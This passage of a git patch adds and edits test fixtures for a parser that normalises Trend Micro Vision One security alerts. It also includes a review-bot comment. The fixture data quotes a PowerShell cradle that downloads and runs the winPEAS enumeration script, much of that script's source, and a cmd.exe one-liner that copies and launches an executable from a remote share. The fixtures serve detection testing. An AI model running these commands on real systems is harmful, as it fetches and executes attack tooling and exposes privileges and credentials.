\"fullpath\", \"field\": \"processFilePath\", \"value\": \"C:\\\\Users\\\\jdoe\\\\AppData\\\\Local\\\\Temp\\\\54\\\\SesProbe-31944.exe\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\"], \"provenance\": [\"Alert\"]}, {\"id\": 17, \"type\": \"fullpath\", \"field\": \"objectName\", \"value\": \"C:\\\\Windows\\\\System32\\\\gpresult.exe\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\"], \"provenance\": [\"Alert\"]}, {\"id\": 18, \"type\": \"host\", \"field\": \"\", \"value\": {\"guid\": \"\", \"name\": \"99.255.12.39\", \"ips\": [\"99.255.12.39\"]}, \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [], \"provenance\": [\"Lateral Movement Enrichment\"]}, {\"id\": 19, \"type\": \"process_id\", \"field\": \"objectPid\", \"value\": \"5552\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": 
[\"Alert\"]}, {\"id\": 20, \"type\": \"user_account\", \"field\": \"\", \"value\": \"systel.support\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [], \"provenance\": [\"Related Asset Enrichment\"]}, {\"id\": 21, \"type\": \"user_account\", \"field\": \"\", \"value\": \"srv-serveur\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [], \"provenance\": [\"Related Asset Enrichment\"]}, {\"id\": 22, \"type\": \"user_account\", \"field\": \"\", \"value\": \"daqsan.support\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [], \"provenance\": [\"Related Asset Enrichment\"]}]}", + "event": { + "category": [ + "intrusion_detection" + ], + "kind": "alert", + "reason": "Process Injection from Windows Temporary Location to System32", + "type": [ + "info" + ] + }, + "@timestamp": "2024-07-23T07:49:48Z", + "host": { + "id": "7E8FDBEF-FFF7-4C41-9E33-171366D30299", + "ip": [ + "19.112.87.74" + ], + "name": "CHTX-XMEDICA-2K12.windows10.local" + }, + "observer": { + "product": "Vision One", + "vendor": "TrendMicro" + }, + "process": { + "command_line": "SesProbe-31944.exe ", + "executable": "C:\\Users\\jdoe\\AppData\\Local\\Temp\\54\\SesProbe-31944.exe", + "hash": { + "sha1": "3437F7D4E4D48B0F19BD0BB73BB8A9FDBFF2505F", + "sha256": "7DF7979A52BF77DA6A9E8EEDD56FA8081B1F858CB60378C83B250B96CBF24303" + }, + "parent": { + "command_line": "\"C:\\WINDOWS\\system32\\CMD.exe\" /CCD C:\\Users\\USERNAME\\AppData\\Local\\Temp\\54&ECHO @SET X=SesProbe-31944.exe>S&ECHO @SET P=\\\\tsclient\\SESPRO\\BIN>>S&ECHO :B>>S&ECHO @PING 1 -n 2 -w 50>>S&ECHO @IF NOT EXIST %P% GOTO B>>S&ECHO @COPY %P% %X%>>S&ECHO @START %X%>>S&MOVE /Y S S.BAT&S", + "executable": "C:\\Windows\\System32\\cmd.exe", + "hash": { + "sha256": "A354C8A720FAD1AA60AD27CE3FEB0A84B906224A9BC10FC5E87B604BD2CA4502" + } + }, + "pid": 5552 + }, + "related": { + "hash": [ + "3437F7D4E4D48B0F19BD0BB73BB8A9FDBFF2505F", + 
"7DF7979A52BF77DA6A9E8EEDD56FA8081B1F858CB60378C83B250B96CBF24303", + "A354C8A720FAD1AA60AD27CE3FEB0A84B906224A9BC10FC5E87B604BD2CA4502" + ], + "ip": [ + "19.112.87.74" + ], + "user": [ + "jdoe" + ] + }, + "rule": { + "name": "Process Injection from Windows Temporary Location to System32" + }, + "trendmicro": { + "vision_one": { + "alert_id": "WB-11111-22222222-00000", + "incident_id": "IC-14558-20240722-00000", + "investigation_status": "New", + "severity": "medium", + "status": "Open" + } + }, + "user": { + "domain": "windows10", + "id": "windows10\\jdoe", + "name": "jdoe" + } + } +} \ No newline at end of file diff --git a/Trend Micro/trend-micro-vision-one/tests/test_registry.json b/Trend Micro/trend-micro-vision-one/tests/test_registry.json index 83d7e99b5..61b294270 100644 --- a/Trend Micro/trend-micro-vision-one/tests/test_registry.json +++ b/Trend Micro/trend-micro-vision-one/tests/test_registry.json @@ -20,6 +20,7 @@ "name": "k8s_democon_longrunl_default_09451f51-7124-4aa5-a5c4-ada24efe9da9_0" }, "host": { + "id": "35FA11DA-A24E-40CF-8B56-BAF8828CC15E", "ip": [ "10.10.58.51" ], diff --git a/Trend Micro/trend-micro-vision-one/tests/test_service_abuse.json b/Trend Micro/trend-micro-vision-one/tests/test_service_abuse.json new file mode 100644 index 000000000..e3283fe41 --- /dev/null +++ b/Trend Micro/trend-micro-vision-one/tests/test_service_abuse.json 
@@ -0,0 +1,74 @@ +{ + "input": { + "message": "{\"schemaVersion\": \"1.15\", \"id\": \"WB-11111-22222222-00000\", \"investigationStatus\": \"New\", \"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000\", \"alertProvider\": \"SAE\", \"modelId\": \"ce2af827-6dfc-4c5b-ab40-ab4b82351c83\", \"model\": \"Possible Web Service Abuse\", \"modelType\": \"preset\", \"score\": 39, \"severity\": \"medium\", \"createdDateTime\": \"2024-11-26T16:45:28Z\", \"updatedDateTime\": \"2024-11-26T16:45:28Z\", \"ownerIds\": [], \"impactScope\": {\"desktopCount\": 1, \"serverCount\": 0, \"accountCount\": 1, \"emailAddressCount\": 0, \"containerCount\": 0, \"cloudIdentityCount\": 0, \"entities\": [{\"entityType\": \"account\", \"entityValue\": \"windows10\\\\jdoe\", \"entityId\": \"windows10\\\\jdoe\", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"e930412e-e09c-454b-a508-576ba266b9d8\", \"name\": \"windows10\", \"ips\": [\"20.193.45.33\"]}, \"entityId\": \"e930412e-e09c-454b-a508-576ba266b9d8\", \"relatedEntities\": [\"windows10\\\\jdoe\"], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6, 7, 8, 9], \"provenance\": [\"Alert\"], \"managementScopeGroupId\": \"ce9c7ad6-f895-4907-bf57-e34b59d4dc90\"}]}, \"description\": \"The adversary attempted to download a payload stored on a legitimate external web service.\", \"matchedRules\": [{\"id\": \"ef13e37e-148e-48d6-819f-021f4acfcace\", \"name\": \"Suspicious Powershell Connection To Web Service\", \"matchedFilters\": [{\"id\": \"97e70752-3b27-4db0-b840-507d3f37ffe6\", \"name\": \"Suspicious Powershell Connection To Web Service - Variant 2\", \"matchedDateTime\": \"2024-11-26T16:42:29.602Z\", \"mitreTechniqueIds\": [\"T1102\"], \"matchedEvents\": [{\"uuid\": \"4aed361f-de80-4679-bf18-608b2afe5ff7\", 
\"matchedDateTime\": \"2024-11-26T16:42:29.602Z\", \"type\": \"TELEMETRY_AMSI\"}]}]}], \"indicators\": [{\"id\": 1, \"type\": \"amsi_rawDataStr\", \"field\": \"objectRawDataStr\", \"value\": \"IEX(New-Object Net.WebClient).downloadString('https://raw.githubusercontent.com/peass-ng/PEASS-ng/master/winPEAS/winPEASps1/winPEAS.ps1')\", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": \"amsi_rawDataStr\", \"field\": \"objectRawDataStr\", \"value\": \"<#\\n.SYNOPSIS\\n PowerShell adaptation of WinPEAS.exe / WinPeas.bat\\n.DESCRIPTION\\n For the legal enumeration of windows based computers that you either own or are approved to run this script on\\n.EXAMPLE\\n # Default - normal operation with username/password audit in drives/registry\\n .\\\\winPeas.ps1\\n\\n # Include Excel files in search: .xls, .xlsx, .xlsm\\n .\\\\winPeas.ps1 -Excel\\n\\n # Full audit - normal operation with APIs / Keys / Tokens\\n ## This will produce false positives ## \\n .\\\\winPeas.ps1 -FullCheck \\n\\n # Add Time stamps to each command\\n .\\\\winPeas.ps1 -TimeStamp\\n\\n.NOTES\\n Version: 1.3\\n PEASS-ng Original Author: PEASS-ng\\n winPEAS.ps1 Author: @RandolphConley\\n Creation Date: 10/4/2022\\n Website: https://github.com/peass-ng/PEASS-ng\\n\\n TESTED: PoSh 5,7\\n UNTESTED: PoSh 3,4\\n NOT FULLY COMPATIBLE: PoSh 2 or lower\\n#>\\n\\n######################## FUNCTIONS ########################\\n\\n[CmdletBinding()]\\nparam(\\n [switch]$TimeStamp,\\n [switch]$FullCheck,\\n [switch]$Excel\\n)\\n\\n# Gather KB from all patches installed\\nfunction returnHotFixID {\\n param(\\n [string]$title\\n )\\n # Match on KB or if patch does not have a KB, return end result\\n if (($title | Select-String -AllMatches -Pattern 'KB(\\\\d{4,6})').Matches.Value) {\\n return (($title | Select-String -AllMatches -Pattern 'KB(\\\\d{4,6})').Matches.Value)\\n }\\n elseif (($title | 
Select-String -NotMatch -Pattern 'KB(\\\\d{4,6})').Matches.Value) {\\n return (($title | Select-String -NotMatch -Pattern 'KB(\\\\d{4,6})').Matches.Value)\\n }\\n}\\n\\nFunction Start-ACLCheck {\\n param(\\n $Target, $ServiceName)\\n # Gather ACL of object\\n if ($null -ne $target) {\\n try {\\n $ACLObject = Get-Acl $target -ErrorAction SilentlyContinue\\n }\\n catch { $null }\\n \\n # If Found, Evaluate Permissions\\n if ($ACLObject) { \\n $Identity = @()\\n $Identity += \\\"$env:COMPUTERNAME\\\\$env:USERNAME\\\"\\n if ($ACLObject.Owner -like $Identity ) { Write-Host \\\"$Identity has ownership of $Target\\\" -ForegroundColor Red }\\n # This should now work for any language. Command runs whoami group, removes the first two line of output, converts from csv to object, but adds \\\"group name\\\" to the first column.\\n whoami.exe /groups /fo csv | select-object -skip 2 | ConvertFrom-Csv -Header 'group name' | Select-Object -ExpandProperty 'group name' | ForEach-Object { $Identity += $_ }\\n $IdentityFound = $false\\n foreach ($i in $Identity) {\\n $permission = $ACLObject.Access | Where-Object { $_.IdentityReference -like $i }\\n $UserPermission = \\\"\\\"\\n switch -WildCard ($Permission.FileSystemRights) {\\n \\\"FullControl\\\" { $userPermission = \\\"FullControl\\\"; $IdentityFound = $true }\\n \\\"Write*\\\" { $userPermission = \\\"Write\\\"; $IdentityFound = $true }\\n \\\"Modify\\\" { $userPermission = \\\"Modify\\\"; $IdentityFound = $true }\\n }\\n Switch ($permission.RegistryRights) {\\n \\\"FullControl\\\" { $userPermission = \\\"FullControl\\\"; $IdentityFound = $true }\\n }\\n if ($UserPermission) {\\n if ($ServiceName) { Write-Host \\\"$ServiceName found with permissions issue:\\\" -ForegroundColor Red }\\n Write-Host -ForegroundColor red \\\"Identity $($permission.IdentityReference) has '$userPermission' perms for $Target\\\"\\n }\\n } \\n # Identity Found Check - If False, loop through and stop at root of drive\\n if ($IdentityFound -eq $false) {\\n 
if ($Target.Length -gt 3) {\\n $Target = Split-Path $Target\\n Start-ACLCheck $Target -ServiceName $ServiceName\\n }\\n }\\n }\\n else {\\n # If not found, split path one level and Check again\\n $Target = Split-Path $Target\\n Start-ACLCheck $Target $ServiceName\\n }\\n }\\n}\\n\\nFunction UnquotedServicePathCheck {\\n Write-Host \\\"Fetching the list of services, this may take a while...\\\";\\n $services = Get-WmiObject -Class Win32_Service | Where-Object { $_.PathName -inotmatch \\\"`\\\"\\\" -and $_.PathName -inotmatch \\\":\\\\\\\\Windows\\\\\\\\\\\" -and ($_.StartMode -eq \\\"Auto\\\" -or $_.StartMode -eq \\\"Manual\\\") -and ($_.State -eq \\\"Running\\\" -or $_.State -eq \\\"Stopped\\\") };\\n if ($($services | Measure-Object).Count -lt 1) {\\n Write-Host \\\"No unquoted service paths were found\\\";\\n }\\n else {\\n $services | ForEach-Object {\\n Write-Host \\\"Unquoted Service Path found!\\\" -ForegroundColor red\\n Write-Host Name: $_.Name\\n Write-Host PathName: $_.PathName\\n Write-Host StartName: $_.StartName \\n Write-Host StartMode: $_.StartMode\\n Write-Host Running: $_.State\\n } \\n }\\n}\\n\\nfunction TimeElapsed { Write-Host \\\"Time Running: $($stopwatch.Elapsed.Minutes):$($stopwatch.Elapsed.Seconds)\\\" }\\nFunction Get-ClipBoardText {\\n Add-Type -AssemblyName PresentationCore\\n $text = [Windows.Clipboard]::GetText()\\n if ($text) {\\n Write-Host \\\"\\\"\\n if ($TimeStamp) { TimeElapsed }\\n Write-Host -ForegroundColor Blue \\\"=========|| ClipBoard text found:\\\"\\n Write-Host $text\\n \\n }\\n}\\n\\nFunction Search-Excel {\\n [cmdletbinding()]\\n Param (\\n [parameter(Mandatory, ValueFromPipeline)]\\n [ValidateScript({\\n Try {\\n If (Test-Path -Path $_) {$True}\\n \", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": 
\"\\\"C:\\\\Windows\\\\system32\\\\WindowsPowerShell\\\\v1.0\\\\PowerShell_ISE.exe\\\" \", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}, {\"id\": 4, \"type\": \"command_line\", \"field\": \"parentCmd\", \"value\": \"C:\\\\Windows\\\\Explorer.EXE\", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"file_sha256\", \"field\": \"processFileHashSha256\", \"value\": \"440C8F6BC2F87D1932261D8F49D014CA330BC49EEBEAEEE59DA61790A2910EAF\", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": \"fullpath\", \"field\": \"processFilePath\", \"value\": \"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell_ise.exe\", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}, {\"id\": 7, \"type\": \"process_id\", \"field\": \"processPid\", \"value\": \"5040\", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}, {\"id\": 8, \"type\": \"process_id\", \"field\": \"parentPid\", \"value\": \"9920\", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}, {\"id\": 9, \"type\": \"text\", \"field\": \"endpointHostName\", \"value\": \"Windows10\", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}]}" + }, + "expected": { + "message": "{\"schemaVersion\": \"1.15\", \"id\": \"WB-11111-22222222-00000\", \"investigationStatus\": \"New\", 
\"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000\", \"alertProvider\": \"SAE\", \"modelId\": \"ce2af827-6dfc-4c5b-ab40-ab4b82351c83\", \"model\": \"Possible Web Service Abuse\", \"modelType\": \"preset\", \"score\": 39, \"severity\": \"medium\", \"createdDateTime\": \"2024-11-26T16:45:28Z\", \"updatedDateTime\": \"2024-11-26T16:45:28Z\", \"ownerIds\": [], \"impactScope\": {\"desktopCount\": 1, \"serverCount\": 0, \"accountCount\": 1, \"emailAddressCount\": 0, \"containerCount\": 0, \"cloudIdentityCount\": 0, \"entities\": [{\"entityType\": \"account\", \"entityValue\": \"windows10\\\\jdoe\", \"entityId\": \"windows10\\\\jdoe\", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"e930412e-e09c-454b-a508-576ba266b9d8\", \"name\": \"windows10\", \"ips\": [\"20.193.45.33\"]}, \"entityId\": \"e930412e-e09c-454b-a508-576ba266b9d8\", \"relatedEntities\": [\"windows10\\\\jdoe\"], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6, 7, 8, 9], \"provenance\": [\"Alert\"], \"managementScopeGroupId\": \"ce9c7ad6-f895-4907-bf57-e34b59d4dc90\"}]}, \"description\": \"The adversary attempted to download a payload stored on a legitimate external web service.\", \"matchedRules\": [{\"id\": \"ef13e37e-148e-48d6-819f-021f4acfcace\", \"name\": \"Suspicious Powershell Connection To Web Service\", \"matchedFilters\": [{\"id\": \"97e70752-3b27-4db0-b840-507d3f37ffe6\", \"name\": \"Suspicious Powershell Connection To Web Service - Variant 2\", \"matchedDateTime\": \"2024-11-26T16:42:29.602Z\", \"mitreTechniqueIds\": [\"T1102\"], \"matchedEvents\": [{\"uuid\": \"4aed361f-de80-4679-bf18-608b2afe5ff7\", \"matchedDateTime\": \"2024-11-26T16:42:29.602Z\", \"type\": \"TELEMETRY_AMSI\"}]}]}], \"indicators\": [{\"id\": 1, \"type\": \"amsi_rawDataStr\", 
\"field\": \"objectRawDataStr\", \"value\": \"IEX(New-Object Net.WebClient).downloadString('https://raw.githubusercontent.com/peass-ng/PEASS-ng/master/winPEAS/winPEASps1/winPEAS.ps1')\", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": \"amsi_rawDataStr\", \"field\": \"objectRawDataStr\", \"value\": \"<#\\n.SYNOPSIS\\n PowerShell adaptation of WinPEAS.exe / WinPeas.bat\\n.DESCRIPTION\\n For the legal enumeration of windows based computers that you either own or are approved to run this script on\\n.EXAMPLE\\n # Default - normal operation with username/password audit in drives/registry\\n .\\\\winPeas.ps1\\n\\n # Include Excel files in search: .xls, .xlsx, .xlsm\\n .\\\\winPeas.ps1 -Excel\\n\\n # Full audit - normal operation with APIs / Keys / Tokens\\n ## This will produce false positives ## \\n .\\\\winPeas.ps1 -FullCheck \\n\\n # Add Time stamps to each command\\n .\\\\winPeas.ps1 -TimeStamp\\n\\n.NOTES\\n Version: 1.3\\n PEASS-ng Original Author: PEASS-ng\\n winPEAS.ps1 Author: @RandolphConley\\n Creation Date: 10/4/2022\\n Website: https://github.com/peass-ng/PEASS-ng\\n\\n TESTED: PoSh 5,7\\n UNTESTED: PoSh 3,4\\n NOT FULLY COMPATIBLE: PoSh 2 or lower\\n#>\\n\\n######################## FUNCTIONS ########################\\n\\n[CmdletBinding()]\\nparam(\\n [switch]$TimeStamp,\\n [switch]$FullCheck,\\n [switch]$Excel\\n)\\n\\n# Gather KB from all patches installed\\nfunction returnHotFixID {\\n param(\\n [string]$title\\n )\\n # Match on KB or if patch does not have a KB, return end result\\n if (($title | Select-String -AllMatches -Pattern 'KB(\\\\d{4,6})').Matches.Value) {\\n return (($title | Select-String -AllMatches -Pattern 'KB(\\\\d{4,6})').Matches.Value)\\n }\\n elseif (($title | Select-String -NotMatch -Pattern 'KB(\\\\d{4,6})').Matches.Value) {\\n return (($title | Select-String -NotMatch -Pattern 
'KB(\\\\d{4,6})').Matches.Value)\\n }\\n}\\n\\nFunction Start-ACLCheck {\\n param(\\n $Target, $ServiceName)\\n # Gather ACL of object\\n if ($null -ne $target) {\\n try {\\n $ACLObject = Get-Acl $target -ErrorAction SilentlyContinue\\n }\\n catch { $null }\\n \\n # If Found, Evaluate Permissions\\n if ($ACLObject) { \\n $Identity = @()\\n $Identity += \\\"$env:COMPUTERNAME\\\\$env:USERNAME\\\"\\n if ($ACLObject.Owner -like $Identity ) { Write-Host \\\"$Identity has ownership of $Target\\\" -ForegroundColor Red }\\n # This should now work for any language. Command runs whoami group, removes the first two line of output, converts from csv to object, but adds \\\"group name\\\" to the first column.\\n whoami.exe /groups /fo csv | select-object -skip 2 | ConvertFrom-Csv -Header 'group name' | Select-Object -ExpandProperty 'group name' | ForEach-Object { $Identity += $_ }\\n $IdentityFound = $false\\n foreach ($i in $Identity) {\\n $permission = $ACLObject.Access | Where-Object { $_.IdentityReference -like $i }\\n $UserPermission = \\\"\\\"\\n switch -WildCard ($Permission.FileSystemRights) {\\n \\\"FullControl\\\" { $userPermission = \\\"FullControl\\\"; $IdentityFound = $true }\\n \\\"Write*\\\" { $userPermission = \\\"Write\\\"; $IdentityFound = $true }\\n \\\"Modify\\\" { $userPermission = \\\"Modify\\\"; $IdentityFound = $true }\\n }\\n Switch ($permission.RegistryRights) {\\n \\\"FullControl\\\" { $userPermission = \\\"FullControl\\\"; $IdentityFound = $true }\\n }\\n if ($UserPermission) {\\n if ($ServiceName) { Write-Host \\\"$ServiceName found with permissions issue:\\\" -ForegroundColor Red }\\n Write-Host -ForegroundColor red \\\"Identity $($permission.IdentityReference) has '$userPermission' perms for $Target\\\"\\n }\\n } \\n # Identity Found Check - If False, loop through and stop at root of drive\\n if ($IdentityFound -eq $false) {\\n if ($Target.Length -gt 3) {\\n $Target = Split-Path $Target\\n Start-ACLCheck $Target -ServiceName $ServiceName\\n }\\n 
}\\n }\\n else {\\n # If not found, split path one level and Check again\\n $Target = Split-Path $Target\\n Start-ACLCheck $Target $ServiceName\\n }\\n }\\n}\\n\\nFunction UnquotedServicePathCheck {\\n Write-Host \\\"Fetching the list of services, this may take a while...\\\";\\n $services = Get-WmiObject -Class Win32_Service | Where-Object { $_.PathName -inotmatch \\\"`\\\"\\\" -and $_.PathName -inotmatch \\\":\\\\\\\\Windows\\\\\\\\\\\" -and ($_.StartMode -eq \\\"Auto\\\" -or $_.StartMode -eq \\\"Manual\\\") -and ($_.State -eq \\\"Running\\\" -or $_.State -eq \\\"Stopped\\\") };\\n if ($($services | Measure-Object).Count -lt 1) {\\n Write-Host \\\"No unquoted service paths were found\\\";\\n }\\n else {\\n $services | ForEach-Object {\\n Write-Host \\\"Unquoted Service Path found!\\\" -ForegroundColor red\\n Write-Host Name: $_.Name\\n Write-Host PathName: $_.PathName\\n Write-Host StartName: $_.StartName \\n Write-Host StartMode: $_.StartMode\\n Write-Host Running: $_.State\\n } \\n }\\n}\\n\\nfunction TimeElapsed { Write-Host \\\"Time Running: $($stopwatch.Elapsed.Minutes):$($stopwatch.Elapsed.Seconds)\\\" }\\nFunction Get-ClipBoardText {\\n Add-Type -AssemblyName PresentationCore\\n $text = [Windows.Clipboard]::GetText()\\n if ($text) {\\n Write-Host \\\"\\\"\\n if ($TimeStamp) { TimeElapsed }\\n Write-Host -ForegroundColor Blue \\\"=========|| ClipBoard text found:\\\"\\n Write-Host $text\\n \\n }\\n}\\n\\nFunction Search-Excel {\\n [cmdletbinding()]\\n Param (\\n [parameter(Mandatory, ValueFromPipeline)]\\n [ValidateScript({\\n Try {\\n If (Test-Path -Path $_) {$True}\\n \", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"\\\"C:\\\\Windows\\\\system32\\\\WindowsPowerShell\\\\v1.0\\\\PowerShell_ISE.exe\\\" \", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], 
\"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}, {\"id\": 4, \"type\": \"command_line\", \"field\": \"parentCmd\", \"value\": \"C:\\\\Windows\\\\Explorer.EXE\", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"file_sha256\", \"field\": \"processFileHashSha256\", \"value\": \"440C8F6BC2F87D1932261D8F49D014CA330BC49EEBEAEEE59DA61790A2910EAF\", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": \"fullpath\", \"field\": \"processFilePath\", \"value\": \"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell_ise.exe\", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}, {\"id\": 7, \"type\": \"process_id\", \"field\": \"processPid\", \"value\": \"5040\", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}, {\"id\": 8, \"type\": \"process_id\", \"field\": \"parentPid\", \"value\": \"9920\", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}, {\"id\": 9, \"type\": \"text\", \"field\": \"endpointHostName\", \"value\": \"Windows10\", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}]}", + "event": { + "category": [ + "intrusion_detection" + ], + "kind": "alert", + "reason": "Possible Web Service Abuse", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-26T16:45:28Z", + "action": { + "properties": { + "ScriptBlockText": "IEX(New-Object 
Net.WebClient).downloadString('https://raw.githubusercontent.com/peass-ng/PEASS-ng/master/winPEAS/winPEASps1/winPEAS.ps1')" + } + }, + "host": { + "id": "e930412e-e09c-454b-a508-576ba266b9d8", + "ip": [ + "20.193.45.33" + ], + "name": "windows10" + }, + "observer": { + "product": "Vision One", + "vendor": "TrendMicro" + }, + "process": { + "command_line": "\"C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\PowerShell_ISE.exe\" ", + "executable": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell_ise.exe", + "hash": { + "sha256": "440C8F6BC2F87D1932261D8F49D014CA330BC49EEBEAEEE59DA61790A2910EAF" + }, + "parent": { + "command_line": "C:\\Windows\\Explorer.EXE", + "pid": 9920 + }, + "pid": 5040 + }, + "related": { + "hash": [ + "440C8F6BC2F87D1932261D8F49D014CA330BC49EEBEAEEE59DA61790A2910EAF" + ], + "ip": [ + "20.193.45.33" + ], + "user": [ + "jdoe" + ] + }, + "rule": { + "name": "Possible Web Service Abuse" + }, + "trendmicro": { + "vision_one": { + "alert_id": "WB-11111-22222222-00000", + "investigation_status": "New", + "severity": "medium", + "status": "Open" + } + }, + "user": { + "domain": "windows10", + "id": "windows10\\jdoe", + "name": "jdoe" + } + } +} \ No newline at end of file From b0a30f3d53175743ba460104746263e2d78444db Mon Sep 17 00:00:00 2001 
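Review bot: The expected event for this fixture surfaces the download cradle only as `action.properties.ScriptBlockText` and never extracts the fetched URL (`https://raw.githubusercontent.com/peass-ng/PEASS-ng/.../winPEAS.ps1`) into `url.*` or `related` fields, so analysts cannot pivot on the download source from ECS fields; if the parser has no URL extraction for `amsi_rawDataStr` indicators that is worth adding, and if it does, this fixture should assert it. The second `amsi_rawDataStr` indicator (id 2, the full winPEAS body) is absent from the expected output, which suggests the parser keeps the first indicator by position rather than by a documented selection rule — confirm and note that choice in the parser, since indicator order in the alert payload is not guaranteed. The host IP `20.193.45.33` is publicly routable; test fixtures should use an RFC 5737 documentation address such as `192.0.2.10` so the expected `host.ip`/`related.ip` values do not point at a real host.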
From: vg-svitla
Date: Thu, 28 Nov 2024 15:28:49 +0200
Subject: [PATCH 104/150] Fix review comments
---
 SentinelOne/identity/ingest/parser.yml | 10 +++++-----
 SentinelOne/identity/tests/test_alert_1.json | 14 ++++++--------
 SentinelOne/identity/tests/test_alert_11.json | 14 ++++++--------
 SentinelOne/identity/tests/test_alert_12.json | 14 ++++++--------
 SentinelOne/identity/tests/test_alert_13.json | 14 ++++++--------
 SentinelOne/identity/tests/test_alert_14.json | 14 ++++++--------
 SentinelOne/identity/tests/test_alert_15.json | 14 ++++++--------
 SentinelOne/identity/tests/test_alert_16.json | 14 ++++++--------
 SentinelOne/identity/tests/test_alert_5.json | 14 ++++++--------
 SentinelOne/identity/tests/test_alert_6.json | 14 ++++++--------
 SentinelOne/identity/tests/test_alert_7.json | 14 ++++++--------
 11 files changed, 65 insertions(+), 85 deletions(-)
diff --git a/SentinelOne/identity/ingest/parser.yml b/SentinelOne/identity/ingest/parser.yml
index 79cd3ec9f..90577404d 100644
--- a/SentinelOne/identity/ingest/parser.yml
+++ b/SentinelOne/identity/ingest/parser.yml
@@ -51,11 +51,11 @@ stages:
